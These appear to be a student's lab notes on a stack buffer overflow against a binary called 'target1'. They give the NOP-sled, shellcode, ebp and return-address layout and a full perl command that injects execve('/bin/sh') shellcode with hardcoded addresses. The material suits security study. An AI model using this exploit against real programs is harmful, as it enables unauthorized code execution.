The input's size will be 220+8, therefore we can overwrite eip.

The struture is like below.

| nop sled (175) | shellcode (45) | ebp (4) | ret addr(4) |

1. put the target address to $eip in order to point to the target place when return.
the target address is between buf and buf+175, which is in the range of nop sled, then it will run nop and shellcode.
2. put the valid ebp in ebp to avoid segmentation fault.(?)
3. put the shellcode right before ebp.
4. fill the rest part with nop.

./target1 $(perl -e 'print "\x90"x175; print "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; print "\x28\xf7\xff\xbf" ;print "\x8e\xf6\xff\xbf"')
